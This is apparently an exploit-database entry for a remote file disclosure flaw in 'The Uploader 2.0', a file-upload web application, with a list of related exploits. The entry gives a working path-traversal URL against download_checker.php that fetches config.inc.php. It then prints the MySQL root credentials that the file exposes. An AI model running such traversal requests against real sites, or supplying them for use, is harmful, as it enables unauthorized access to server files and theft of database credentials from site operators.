# Title: The Uploader 2.0 Remote File disclosure Vulnerability # Author: Stack http://server/the_uploader/api/download_checker.php?filename=../config.inc.php next open the config.inc.php file and you got the MySQL configuration ( user & password ) :d //MySQL configuration and connection functions $main['host']="127.0.0.1"; $main['user']="root"; $main['pass']="jH445Ui"; $main['dbnm']="jkL_database";
Related Exploits
Trying to match CVEs (1): CVE-2009-4816Trying to match OSVDBs (1): 61270
Other Possible E-DB Search Terms: The Uploader 2.0, The Uploader
Date | D | V | Title | Author |
---|---|---|---|---|
2009-12-22 |
![]() |
The Uploader 2.0 - Arbitrary File Upload | Master Mind | |
2010-06-22 |
![]() |
The Uploader 2.0.4 - Remote File Disclosure | Xa7m3d | |
2012-02-23 |
![]() |
The Uploader 2.0.4 (English/Italian) - Arbitrary File Upload / Remote Code Execution (Metasploit) | Danny Moules |